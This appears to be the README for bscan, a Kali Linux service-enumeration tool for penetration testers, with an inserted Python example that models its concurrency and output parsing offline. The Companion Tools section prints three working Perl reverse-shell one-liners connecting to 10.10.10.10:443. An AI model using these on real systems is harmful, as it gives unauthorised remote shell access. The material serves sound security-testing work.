Bscan – An Asynchronous Target Enumeration Tool


Synopsis
bscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.

Installation
bscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.
Download the latest packaged version from PyPI:
Or get the bleeding-edge version from version control:

pip install https://github.com/welchbj/bscan/archive/master.tar.gz

Basic Usage
bscan has a wide variety of configuration options which can be used to tune scans to your needs. Here's a quick example:

$ bscan \
> --max-concurrency 3 \
> --patterns [Mm]icrosoft \
> --status-interval 10 \
> --verbose-status \
> scanme.nmap.org

What's going on here?

  • --max-concurrency 3 indicates that no more than 3 concurrent scan subprocesses can be run at a time
  • --patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output
  • --status-interval 10 tells bscan to print runtime status updates every 10 seconds
  • --verbose-status means that each of these status updates will print details of all currently-running scan subprocesses
  • scanme.nmap.org is the host upon which we want to enumerate

bscan also relies on some additional configuration files. The default files can be found in the bscan/configuration directory and serve the following purposes:

  • patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan output
  • required-programs.txt specifies the installed programs that bscan plans on using
  • port-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan output
  • service-scans.toml defines the scans to be run on the target(s) on a per-service basis
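The three mechanisms described above (a cap on concurrent scan subprocesses, regex highlighting of scan output, and regex extraction of port numbers and service names from that output) are easier to reason about with a small working model. The following Python is an added example written for this page, not bscan's own code: the `--max-concurrency` style cap is an `asyncio.Semaphore`, the regex `PORT_LINE_RE` stands in for what `port-scans.toml` would configure, the child processes are stand-ins that print constructed nmap-style lines so the whole thing runs offline, and every name in it is hypothetical.

```python
"""Constructed illustration of the mechanisms the bscan README describes:
a cap on concurrent scan subprocesses (--max-concurrency), regex highlighting
of scan output (--patterns / patterns.txt) and regex extraction of port and
service names from scanner output (the role of port-scans.toml).
Not bscan's own code; every name and the sample output below are made up."""
from __future__ import annotations

import asyncio
import re
import sys
from dataclasses import dataclass

# Constructed nmap-style output, split into chunks so that each stand-in
# "scan" subprocess below can emit one piece of it.
SAMPLE_SCAN_CHUNKS = [
    "PORT     STATE SERVICE       VERSION",
    "22/tcp   open  ssh           OpenSSH 6.6.1p1",
    "80/tcp   open  http          Apache httpd 2.4.7",
    "445/tcp  open  microsoft-ds  Microsoft Windows 7 microsoft-ds",
    "3389/tcp open  ms-wbt-server Microsoft Terminal Services",
    "161/udp  open  snmp          SNMPv1 server",
]

# Hypothetical port-scan regex of the kind port-scans.toml would hold: it must
# yield the port number and the service name for every open port it sees.
PORT_LINE_RE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+open\s+(?P<service>\S+)", re.MULTILINE
)


@dataclass(frozen=True)
class OpenPort:
    port: int
    proto: str
    service: str


def parse_open_ports(scan_output: str) -> list[OpenPort]:
    """Apply the port-scan regex to raw scanner output (cf. port-scans.toml)."""
    return [
        OpenPort(int(m["port"]), m["proto"], m["service"])
        for m in PORT_LINE_RE.finditer(scan_output)
    ]


def highlight(scan_output: str, patterns: list[str]) -> str:
    """Mark every match of the user's patterns (cf. --patterns / patterns.txt).
    The patterns are joined into one alternation so a single pass is made and
    a marker inserted for one pattern can never be re-matched by another.
    A real console client would emit ANSI colour escapes instead of [[ ]]."""
    if not patterns:
        return scan_output
    combined = re.compile("|".join(f"(?:{p})" for p in patterns))
    return combined.sub(lambda m: f"[[{m.group(0)}]]", scan_output)


def make_scan_commands() -> list[list[str]]:
    """Stand-ins for real scanner invocations: each child sleeps briefly and
    prints one chunk of the constructed output, so the demo runs offline."""
    return [
        [sys.executable, "-c", f"import time; time.sleep(0.1); print({chunk!r})"]
        for chunk in SAMPLE_SCAN_CHUNKS
    ]


async def _run_scan(cmd: list[str], sem: asyncio.Semaphore, stats: dict) -> str:
    # The semaphore is the concurrency cap: at most max_concurrency children
    # are alive at once; the remaining coroutines wait here for a slot.
    async with sem:
        stats["running"] += 1
        stats["peak"] = max(stats["peak"], stats["running"])
        proc = await asyncio.create_subprocess_exec(*cmd, stdout=asyncio.subprocess.PIPE)
        out, _ = await proc.communicate()
        stats["running"] -= 1
        return out.decode()


async def _run_all(cmds: list[list[str]], max_concurrency: int) -> tuple[str, int]:
    sem = asyncio.Semaphore(max_concurrency)
    stats = {"running": 0, "peak": 0}
    outputs = await asyncio.gather(*(_run_scan(c, sem, stats) for c in cmds))
    return "".join(outputs), stats["peak"]


def enumerate_target(max_concurrency: int = 3, patterns: list[str] | None = None) -> dict:
    """Run the stand-in scans under the concurrency cap, then post-process the
    combined output as the README describes: parse ports, highlight matches."""
    output, peak = asyncio.run(_run_all(make_scan_commands(), max_concurrency))
    return {
        "peak_concurrency": peak,
        "open_ports": parse_open_ports(output),
        "highlighted": highlight(output, patterns or ["[Mm]icrosoft"]),
    }


if __name__ == "__main__":
    result = enumerate_target(max_concurrency=3)
    print(f"peak concurrent subprocesses: {result['peak_concurrency']}")
    for p in result["open_ports"]:
        print(f"{p.port}/{p.proto} -> {p.service}")
    print(result["highlighted"])
```

Two details are worth noting. The peak-concurrency count is deterministic rather than timing dependent: each coroutine increments the counter before its first real `await`, so with six scans and a cap of three the first three acquire the semaphore before any child has been spawned. And the parsed `OpenPort` list is what a per-service scan stage (the role of `service-scans.toml`) would consume, which is why the service name is pulled out alongside the port number.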

Detailed Options
Here's what you should see when running bscan --help:

usage: bscan [OPTIONS] targets

 _
| |__  ___  ___ __ _ _ __
| '_ \/ __|/ __/ _` | '_ \
| |_) \__ \ (__ (_| | | | |
|_.__/|___/\___\__,_|_| |_|

an asynchronous service enumeration tool

positional arguments:
  targets               the targets and/or networks on which to perform enumeration

optional arguments:
  -h, --help            show this help message and exit
  --brute-pass-list F   filename of password list to use for brute-forcing
  --brute-user-list F   filename of user list to use for brute-forcing
  --cmd-print-width I   the maximum integer number of characters allowed when printing
                        the command used to spawn a running subprocess (defaults to 80)
  --config-dir D        the base directory from which to load the configuration files;
                        required configuration files missing from this directory will
                        instead be loaded from the default files shipped with this
                        program
  --hard                force overwrite of existing directories
  --max-concurrency I   maximum integer number of subprocesses permitted to be running
                        concurrently (defaults to 20)
  --no-program-check    disable checking the presence of required system programs
  --no-file-check       disable checking the presence of files such as configured
                        wordlists
  --no-service-scans    disable running scans on discovered services
  --output-dir D        the base directory in which to write output files
  --patterns [ [ ...]]  regex patterns to highlight in output text
  --ping-sweep          enable ping sweep filtering of hosts from a network range
                        before running more intensive scans
  --quick-only          whether to only run the quick scan (and not include the
                        thorough scan over all ports)
  --qs-method S         the method for performing the initial TCP port scan; must
                        correspond to a configured port scan
  --status-interval I   integer number of seconds to pause in between printing status
                        updates; a non-positive value disables updates (defaults to 30)
  --ts-method S         the method for performing the thorough TCP port scan; must
                        correspond to a configured port scan
  --udp                 whether to run UDP scans
  --udp-method S        the method for performing the UDP port scan; must correspond
                        to a configured port scan
  --verbose-status      whether to print verbose runtime status updates, based on
                        frequency specified by `--status-interval` flag
  --version             program version
  --web-word-list F     the wordlist to use for scans

Companion Tools
The main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.
bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here's a simple example:

$ bscan-wordlists --find "*win*"
/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
/usr/share/wordlists/metasploit/sensitive_files_win.txt
/usr/share/seclists/Passwords/common-passwords-win.txt

Try bscan-wordlists --help to explore other options.
bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here's a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:

$ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
perl for windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl with /bin/sh
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl without /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells --help to explore other options.

Development
Start by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):

# set up the environment
mkvirtualenv -p $(which python3) bscan-dev
workon bscan-dev

# get the deps
pip install -r dev-requirements.txt

Lint and type-check the project (these are run on Travis, too):
When it's time to package a new release:

# build source and wheel distributions
python setup.py bdist_wheel sdist

# run post-build checks
twine check dist/*

# upload to PyPI
twine upload dist/*
